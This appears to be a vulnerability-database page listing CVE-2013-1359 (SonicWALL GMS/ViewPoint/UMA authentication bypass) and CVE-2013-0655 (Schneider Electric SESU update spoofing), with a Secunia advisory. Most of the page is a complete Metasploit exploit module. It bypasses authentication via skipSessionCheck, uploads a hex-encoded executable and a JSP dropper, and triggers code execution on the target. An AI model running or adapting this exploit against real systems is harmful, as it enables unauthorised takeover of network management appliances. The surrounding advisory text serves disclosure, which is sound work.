GMS/ViewPoint/UMA 5.1.x
GMS/ViewPoint 5.0.x
GMS/ViewPoint 4.1.x
SonicWALL is a full-featured Internet security appliance designed specifically for large networks with ever-growing VPN needs. Authorization vulnerabilities exist in several DELL SonicWALL products.
| VAR-202002-0532 | CVE-2013-1359 | Authentication vulnerabilities in multiple SonicWALL products |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
An Authentication Bypass Vulnerability exists in DELL SonicWALL Analyzer 7.0, Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0; Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, 5.1, and 6.0 via the skipSessionCheck parameter to the UMA interface (/appliance/), which could let a remote malicious user obtain access to the root account. Multiple SonicWALL products contain an authentication vulnerability. Information may be obtained or tampered with, and service operation may be interrupted (DoS).
Attackers can exploit this issue to gain administrative access to the web interface. This allows attackers to execute arbitrary code with SYSTEM privileges that could fully compromise the system.
The following versions are affected:
GMS/Analyzer/UMA 7.0.x
GMS/ViewPoint/UMA 6.0.x
GMS/ViewPoint/UMA 5.1.x
GMS/ViewPoint 5.0.x
GMS/ViewPoint 4.1.x
SonicWALL is a full-featured Internet security appliance designed specifically for large networks with ever-growing VPN needs. Authorization vulnerabilities exist in several DELL SonicWALL products.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'SonicWALL GMS 6 Arbitrary File Upload',
      'Description' => %q{
          This module exploits a code execution flaw in SonicWALL GMS. It exploits two
        vulnerabilities in order to get its objective. An authentication bypass in the
        Web Administration interface allows to abuse the "appliance" application and upload
        an arbitrary payload embedded in a JSP. The module has been tested successfully on
        SonicWALL GMS 6.0.6017 over Windows 2003 SP2 and SonicWALL GMS 6.0.6022 Virtual
        Appliance (Linux). On the Virtual Appliance the linux meterpreter hasn't run
        successfully while testing, shell payload have been used.
      },
      'Author' =>
        [
          'Nikolas Sotiriu', # Vulnerability Discovery
          'Julian Vilas <julian.vilas[at]gmail.com>', # Metasploit module
          'juan vazquez' # Metasploit module
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'CVE', '2013-1359'],
          [ 'OSVDB', '89347' ],
          [ 'BID', '57445' ],
          [ 'EDB', '24204' ]
        ],
      'Privileged' => true,
      'Platform' => [ 'win', 'linux' ],
      'Targets' =>
        [
          [ 'SonicWALL GMS 6.0 Viewpoint / Windows 2003 SP2',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win'
            }
          ],
          [ 'SonicWALL GMS Viewpoint 6.0 Virtual Appliance (Linux)',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux'
            }
          ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Jan 17 2012'))

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('TARGETURI', [true, 'Path to SonicWall GMS', '/'])
      ], self.class)
  end

  def on_new_session
    # on_new_session will force stdapi to load (for Linux meterpreter)
  end

  def generate_jsp
    var_hexpath = Rex::Text.rand_text_alpha(rand(8)+8)
    var_exepath = Rex::Text.rand_text_alpha(rand(8)+8)
    var_data = Rex::Text.rand_text_alpha(rand(8)+8)
    var_inputstream = Rex::Text.rand_text_alpha(rand(8)+8)
    var_outputstream = Rex::Text.rand_text_alpha(rand(8)+8)
    var_numbytes = Rex::Text.rand_text_alpha(rand(8)+8)
    var_bytearray = Rex::Text.rand_text_alpha(rand(8)+8)
    var_bytes = Rex::Text.rand_text_alpha(rand(8)+8)
    var_counter = Rex::Text.rand_text_alpha(rand(8)+8)
    var_char1 = Rex::Text.rand_text_alpha(rand(8)+8)
    var_char2 = Rex::Text.rand_text_alpha(rand(8)+8)
    var_comb = Rex::Text.rand_text_alpha(rand(8)+8)
    var_exe = Rex::Text.rand_text_alpha(rand(8)+8)
    @var_hexfile = Rex::Text.rand_text_alpha(rand(8)+8)
    var_proc = Rex::Text.rand_text_alpha(rand(8)+8)
    var_fperm = Rex::Text.rand_text_alpha(rand(8)+8)
    var_fdel = Rex::Text.rand_text_alpha(rand(8)+8)

    jspraw = "<%@ page import=\"java.io.*\" %>\n"
    jspraw << "<%\n"
    jspraw << "String #{var_hexpath} = application.getRealPath(\"/\") + \"/#{@var_hexfile}.txt\";\n"
    jspraw << "String #{var_exepath} = System.getProperty(\"java.io.tmpdir\") + \"/#{var_exe}\";\n"
    jspraw << "String #{var_data} = \"\";\n"
    jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n"
    jspraw << "#{var_exepath} = #{var_exepath}.concat(\".exe\");\n"
    jspraw << "}\n"
    jspraw << "FileInputStream #{var_inputstream} = new FileInputStream(#{var_hexpath});\n"
    jspraw << "FileOutputStream #{var_outputstream} = new FileOutputStream(#{var_exepath});\n"
    jspraw << "int #{var_numbytes} = #{var_inputstream}.available();\n"
    jspraw << "byte #{var_bytearray}[] = new byte[#{var_numbytes}];\n"
    jspraw << "#{var_inputstream}.read(#{var_bytearray});\n"
    jspraw << "#{var_inputstream}.close();\n"
    jspraw << "byte[] #{var_bytes} = new byte[#{var_numbytes}/2];\n"
    jspraw << "for (int #{var_counter} = 0; #{var_counter} < #{var_numbytes}; #{var_counter} += 2)\n"
    jspraw << "{\n"
    jspraw << "char #{var_char1} = (char) #{var_bytearray}[#{var_counter}];\n"
    jspraw << "char #{var_char2} = (char) #{var_bytearray}[#{var_counter} + 1];\n"
    jspraw << "int #{var_comb} = Character.digit(#{var_char1}, 16) & 0xff;\n"
    jspraw << "#{var_comb} <<= 4;\n"
    jspraw << "#{var_comb} += Character.digit(#{var_char2}, 16) & 0xff;\n"
    jspraw << "#{var_bytes}[#{var_counter}/2] = (byte)#{var_comb};\n"
    jspraw << "}\n"
    jspraw << "#{var_outputstream}.write(#{var_bytes});\n"
    jspraw << "#{var_outputstream}.close();\n"
    jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") == -1){\n"
    jspraw << "String[] #{var_fperm} = new String[3];\n"
    jspraw << "#{var_fperm}[0] = \"chmod\";\n"
    jspraw << "#{var_fperm}[1] = \"+x\";\n"
    jspraw << "#{var_fperm}[2] = #{var_exepath};\n"
    jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_fperm});\n"
    jspraw << "if (#{var_proc}.waitFor() == 0) {\n"
    jspraw << "#{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n"
    jspraw << "}\n"
    # Linux and other UNICES allow removing files while they are in use...
    jspraw << "File #{var_fdel} = new File(#{var_exepath}); #{var_fdel}.delete();\n"
    jspraw << "} else {\n"
    # Windows does not ..
    jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n"
    jspraw << "}\n"
    jspraw << "%>\n"
    return jspraw
  end

  def get_install_path
    res = send_request_cgi(
      {
        'uri' => "#{@uri}appliance/applianceMainPage?skipSessionCheck=1",
        'method' => 'POST',
        'connection' => 'TE, close',
        'headers' =>
          {
            'TE' => "deflate,gzip;q=0.3",
          },
        'vars_post' => {
          'num' => '123456',
          'action' => 'show_diagnostics',
          'task' => 'search',
          'item' => 'application_log',
          'criteria' => '*.*',
          'width' => '500'
        }
      })

    if res and res.code == 200 and res.body =~ /VALUE="(.*)logs/
      return $1
    end

    return nil
  end

  def upload_file(location, filename, contents)
    post_data = Rex::MIME::Message.new
    post_data.add_part("file_system", nil, nil, "form-data; name=\"action\"")
    post_data.add_part("uploadFile", nil, nil, "form-data; name=\"task\"")
    post_data.add_part(location, nil, nil, "form-data; name=\"searchFolder\"")
    post_data.add_part(contents, "application/octet-stream", nil, "form-data; name=\"uploadFilename\"; filename=\"#{filename}\"")

    data = post_data.to_s
    data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")

    res = send_request_cgi(
      {
        'uri' => "#{@uri}appliance/applianceMainPage?skipSessionCheck=1",
        'method' => 'POST',
        'data' => data,
        'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
        'headers' =>
          {
            'TE' => "deflate,gzip;q=0.3",
          },
        'connection' => 'TE, close'
      })

    if res and res.code == 200 and res.body.empty?
      return true
    else
      return false
    end
  end

  def check
    @peer = "#{rhost}:#{rport}"
    @uri = normalize_uri(target_uri.path)
    @uri << '/' if @uri[-1,1] != '/'

    if get_install_path.nil?
      return Exploit::CheckCode::Safe
    end

    return Exploit::CheckCode::Vulnerable
  end

  def exploit
    @peer = "#{rhost}:#{rport}"
    @uri = normalize_uri(target_uri.path)
    @uri << '/' if @uri[-1,1] != '/'

    # Get Tomcat installation path
    print_status("#{@peer} - Retrieving Tomcat installation path...")
    install_path = get_install_path

    if install_path.nil?
      fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Unable to retrieve the Tomcat installation path")
    end

    print_good("#{@peer} - Tomcat installed on #{install_path}")

    if target['Platform'] == "linux"
      @location = "#{install_path}webapps/appliance/"
    elsif target['Platform'] == "win"
      @location = "#{install_path}webapps\\appliance\\"
    end

    # Upload the JSP and the raw payload
    @jsp_name = rand_text_alphanumeric(8+rand(8))

    jspraw = generate_jsp

    # Specify the payload in hex as an extra file..
    payload_hex = payload.encoded_exe.unpack('H*')[0]

    print_status("#{@peer} - Uploading the payload")

    if upload_file(@location, "#{@var_hexfile}.txt", payload_hex)
      print_good("#{@peer} - Payload successfully uploaded to #{@location}#{@var_hexfile}.txt")
    else
      fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the Payload")
    end

    print_status("#{@peer} - Uploading the JSP")

    if upload_file(@location, "#{@jsp_name}.jsp", jspraw)
      print_good("#{@peer} - JSP successfully uploaded to #{@location}#{@jsp_name}.jsp")
    else
      fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the jsp")
    end

    print_status("Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...")
    res = send_request_cgi(
      {
        'uri' => "#{@uri}appliance/#{@jsp_name}.jsp",
        'method' => 'GET'
      })

    if res and res.code != 200
      print_warning("#{@peer} - Error triggering the payload")
    end

    register_files_for_cleanup("#{@location}#{@var_hexfile}.txt")
    register_files_for_cleanup("#{@location}#{@jsp_name}.jsp")
  end
end
| VAR-201301-0373 | CVE-2013-0655 | Schneider Electric Software Update Utility Arbitrary client code execution vulnerability |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
The client in Schneider Electric Software Update (SESU) Utility 1.0.x and 1.1.x does not ensure that updates have a valid origin, which allows man-in-the-middle attackers to spoof updates, and consequently execute arbitrary code, by modifying the data stream on TCP port 80. Schneider Electric provides total solutions for the energy and infrastructure, industrial, data center and network, building and residential markets in more than 100 countries. The SESU tool used by several of these products is used to update software on Windows PC systems. The Schneider Electric software on the customer's PC uses the SESU service as the communication mechanism for the Schneider Electric Center Update Server, which can be used to receive software updates on a regular basis. The SESU client on the client PC does not check the authenticity of the source. By redirecting the message to port 80 of the unauthorized source, the attacker can execute arbitrary code on the system.
----------------------------------------------------------------------
TITLE:
Schneider Electric Multiple Products SESU Update Spoofing
Vulnerability
SECUNIA ADVISORY ID:
SA51849
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/51849/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=51849
RELEASE DATE:
2013-01-17
DESCRIPTION:
A vulnerability has been reported in multiple Schneider Electric
products, which can be exploited by malicious people to conduct
spoofing attacks.
The vulnerability is caused due to the Schneider-Electric Software
Update (SESU) utility insecurely validating new updates and can be
exploited to e.g. spoof an update via Man-in-the-Middle (MitM)
attacks.
The vulnerability is reported in the following products and
versions:
* IDS version 1.0
* IDS version 2.0
* PowerSuite version 2.5
* Smart Widget Acti 9 version 1.0.0.0
* Smart Widget H8035 version 1.0.0.0
* Smart Widget H8036 version 1.0.0.0
* Smart Widget PM210 version 1.0.0.0
* Smart Widget PM710 version 1.0.0.0
* Smart Widget PM750 version 1.0.0.0
* SoMachine version 1.2.1
* Spacial.pro versions 1.0.0.x
* SESU versions 1.0.x
* SESU versions 1.1.x
* Unity Pro version 5.0
* Unity Pro version 6.0
* Unity Pro version 6.1
* Unity Pro version 4.1
* Vijeo Designer versions 6.0.x
* Vijeo Designer versions 6.1.0.x
* Vijeo Designer versions 5.0.0.x
* Vijeo Designer versions 5.1.0.x
* Vijeo Designer Opti versions 6.0.x
* Vijeo Designer Opti versions 5.1.0.x
* Vijeo Designer Opti versions 5.0.0.x
* Web Gate Client Files version 5.1.x
SOLUTION:
Update the SESU client to a fixed version.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits Arthur Gervais.
ORIGINAL ADVISORY:
Schneider:
http://download.schneider-electric.com/files?p_File_Id=29960974&p_File_Name=SEVD-2013-009-01.pdf
ICS-CERT:
http://www.us-cert.gov/control_systems/pdf/ICSA-13-016-01.pdf